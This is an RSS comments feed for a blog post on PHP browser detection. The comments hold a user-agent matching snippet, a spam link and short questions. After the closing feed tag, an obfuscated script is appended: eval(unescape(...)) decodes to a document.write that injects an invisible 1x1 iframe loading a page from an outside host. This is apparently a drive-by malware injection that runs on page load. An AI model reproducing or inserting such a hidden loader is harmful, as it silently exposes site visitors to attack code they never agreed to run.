











<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Browser Detection with PHP</title>
	<atom:link href="http://blogulate.com/content/browser-detection-with-php/feed/" rel="self" type="application/rss+xml" />
	<link>http://blogulate.com/content/browser-detection-with-php/</link>
	<description>Snippets from the web</description>
	<lastBuildDate>Thu, 18 Mar 2010 00:20:28 -0700</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: fernando</title>
		<link>http://blogulate.com/content/browser-detection-with-php/comment-page-1/#comment-8460</link>
		<dc:creator>fernando</dc:creator>
		<pubDate>Sat, 28 Nov 2009 00:37:37 +0000</pubDate>
		<guid isPermaLink="false">http://blogulate.com/content/browser-detection-with-php/#comment-8460</guid>
		<description> &#039;Win16&#039;,
        &#039;Windows 95&#039; =&gt; &#039;(Windows 95)&#124;(Win95)&#124;(Windows_95)&#039;,
        &#039;Windows 98&#039; =&gt; &#039;(Windows 98)&#124;(Win98)&#039;,
        &#039;Windows 2000&#039; =&gt; &#039;(Windows NT 5.0)&#124;(Windows 2000)&#039;,
        &#039;Windows XP&#039; =&gt; &#039;(Windows NT 5.1)&#124;(Windows XP)&#039;,
        &#039;Windows Server 2003&#039; =&gt; &#039;(Windows NT 5.2)&#039;,
        &#039;Windows Vista&#039; =&gt; &#039;(Windows NT 6.0)&#039;,
        &#039;Windows 7&#039; =&gt; &#039;(Windows NT 7.0)&#039;,
        &#039;Windows NT 4.0&#039; =&gt; &#039;(Windows NT 4.0)&#124;(WinNT4.0)&#124;(WinNT)&#124;(Windows NT)&#039;,
        &#039;Windows ME&#039; =&gt; &#039;Windows ME&#039;,
        &#039;Open BSD&#039; =&gt; &#039;OpenBSD&#039;,
        &#039;Sun OS&#039; =&gt; &#039;SunOS&#039;,
        &#039;Linux&#039; =&gt; &#039;(Linux)&#124;(X11)&#039;,
        &#039;Mac OS&#039; =&gt; &#039;(Mac_PowerPC)&#124;(Macintosh)&#039;,
        &#039;QNX&#039; =&gt; &#039;QNX&#039;,
        &#039;BeOS&#039; =&gt; &#039;BeOS&#039;,
        &#039;OS/2&#039; =&gt; &#039;OS/2&#039;,
        &#039;Search Bot&#039;=&gt;&#039;(nuhk)&#124;(Googlebot)&#124;(Yammybot)&#124;(Openbot)&#124;(Slurp)&#124;(MSNBot)&#124;(Ask Jeeves/Teoma)&#124;(ia_archiver)&#039;
);
 
// Loop through the array of user agents and matching operating systems
foreach($OSList as $CurrOS=&gt;$Match)
{
        // Find a match
        if (eregi($Match, $_SERVER[&#039;HTTP_USER_AGENT&#039;]))
        {
                // We found the correct match
                break;
        }
}
// You are using Windows Vista
echo &quot;You are using &quot;.$CurrOS;
?&gt;

ok ok ok ok ok ok &lt;a href=&quot;http://www.cuscoperuvian.com&quot; rel=&quot;nofollow&quot;&gt;solutions&lt;/a&gt;</description>
		<content:encoded><![CDATA[<p>&#8216;Win16&#8242;,<br />
        &#8216;Windows 95&#8242; =&gt; &#8216;(Windows 95)|(Win95)|(Windows_95)&#8217;,<br />
        &#8216;Windows 98&#8242; =&gt; &#8216;(Windows 98)|(Win98)&#8217;,<br />
        &#8216;Windows 2000&#8242; =&gt; &#8216;(Windows NT 5.0)|(Windows 2000)&#8217;,<br />
        &#8216;Windows XP&#8217; =&gt; &#8216;(Windows NT 5.1)|(Windows XP)&#8217;,<br />
        &#8216;Windows Server 2003&#8242; =&gt; &#8216;(Windows NT 5.2)&#8217;,<br />
        &#8216;Windows Vista&#8217; =&gt; &#8216;(Windows NT 6.0)&#8217;,<br />
        &#8216;Windows 7&#8242; =&gt; &#8216;(Windows NT 7.0)&#8217;,<br />
        &#8216;Windows NT 4.0&#8242; =&gt; &#8216;(Windows NT 4.0)|(WinNT4.0)|(WinNT)|(Windows NT)&#8217;,<br />
        &#8216;Windows ME&#8217; =&gt; &#8216;Windows ME&#8217;,<br />
        &#8216;Open BSD&#8217; =&gt; &#8216;OpenBSD&#8217;,<br />
        &#8216;Sun OS&#8217; =&gt; &#8216;SunOS&#8217;,<br />
        &#8216;Linux&#8217; =&gt; &#8216;(Linux)|(X11)&#8217;,<br />
        &#8216;Mac OS&#8217; =&gt; &#8216;(Mac_PowerPC)|(Macintosh)&#8217;,<br />
        &#8216;QNX&#8217; =&gt; &#8216;QNX&#8217;,<br />
        &#8216;BeOS&#8217; =&gt; &#8216;BeOS&#8217;,<br />
        &#8216;OS/2&#8242; =&gt; &#8216;OS/2&#8242;,<br />
        &#8216;Search Bot&#8217;=&gt;&#8217;(nuhk)|(Googlebot)|(Yammybot)|(Openbot)|(Slurp)|(MSNBot)|(Ask Jeeves/Teoma)|(ia_archiver)&#8217;<br />
);</p>
<p>// Loop through the array of user agents and matching operating systems<br />
foreach($OSList as $CurrOS=&gt;$Match)<br />
{<br />
        // Find a match<br />
        if (eregi($Match, $_SERVER['HTTP_USER_AGENT']))<br />
        {<br />
                // We found the correct match<br />
                break;<br />
        }<br />
}<br />
// You are using Windows Vista<br />
echo &#8220;You are using &#8220;.$CurrOS;<br />
?&gt;</p>
<p>ok ok ok ok ok ok <a href="http://www.cuscoperuvian.com" rel="nofollow">solutions</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Alidom</title>
		<link>http://blogulate.com/content/browser-detection-with-php/comment-page-1/#comment-7695</link>
		<dc:creator>Alidom</dc:creator>
		<pubDate>Fri, 30 Oct 2009 19:12:58 +0000</pubDate>
		<guid isPermaLink="false">http://blogulate.com/content/browser-detection-with-php/#comment-7695</guid>
		<description>Just use http://checkbrowser.info to detect browsers</description>
		<content:encoded><![CDATA[<p>Just use <a href="http://checkbrowser.info" rel="nofollow">http://checkbrowser.info</a> to detect browsers</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Acknowledgements linkdump &#171; Developer Yells at Cloud &#171; Webgurus.com</title>
		<link>http://blogulate.com/content/browser-detection-with-php/comment-page-1/#comment-6545</link>
		<dc:creator>Acknowledgements linkdump &#171; Developer Yells at Cloud &#171; Webgurus.com</dc:creator>
		<pubDate>Fri, 25 Sep 2009 12:54:53 +0000</pubDate>
		<guid isPermaLink="false">http://blogulate.com/content/browser-detection-with-php/#comment-6545</guid>
		<description>[...] Browser Detection with PHP with data downloadable here &#8211; another major time saver, as I removed certain visual elements for less-capable browsers (Internet Explorer, I&#8217;m looking at you) [...]</description>
		<content:encoded><![CDATA[<p>[...] Browser Detection with PHP with data downloadable here &#8211; another major time saver, as I removed certain visual elements for less-capable browsers (Internet Explorer, I&#8217;m looking at you) [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Roy Vincent</title>
		<link>http://blogulate.com/content/browser-detection-with-php/comment-page-1/#comment-6187</link>
		<dc:creator>Roy Vincent</dc:creator>
		<pubDate>Mon, 20 Jul 2009 02:33:27 +0000</pubDate>
		<guid isPermaLink="false">http://blogulate.com/content/browser-detection-with-php/#comment-6187</guid>
		<description>not working Warning: get_browser() [function.get-browser]: browscap ini directive not set. in W:\www\index.php on line 2</description>
		<content:encoded><![CDATA[<p>not working Warning: get_browser() [function.get-browser]: browscap ini directive not set. in W:\www\index.php on line 2</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: david</title>
		<link>http://blogulate.com/content/browser-detection-with-php/comment-page-1/#comment-3752</link>
		<dc:creator>david</dc:creator>
		<pubDate>Thu, 17 Jul 2008 01:30:57 +0000</pubDate>
		<guid isPermaLink="false">http://blogulate.com/content/browser-detection-with-php/#comment-3752</guid>
		<description>for mobile phone browsers, you would use something like handsetdetection.com which detects the phone, screensize, browser type and even location</description>
		<content:encoded><![CDATA[<p>for mobile phone browsers, you would use something like handsetdetection.com which detects the phone, screensize, browser type and even location</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: www.eflight.com.au</title>
		<link>http://blogulate.com/content/browser-detection-with-php/comment-page-1/#comment-3455</link>
		<dc:creator>www.eflight.com.au</dc:creator>
		<pubDate>Tue, 17 Jun 2008 05:12:58 +0000</pubDate>
		<guid isPermaLink="false">http://blogulate.com/content/browser-detection-with-php/#comment-3455</guid>
		<description>What about mobile phone browsers?</description>
		<content:encoded><![CDATA[<p>What about mobile phone browsers?</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>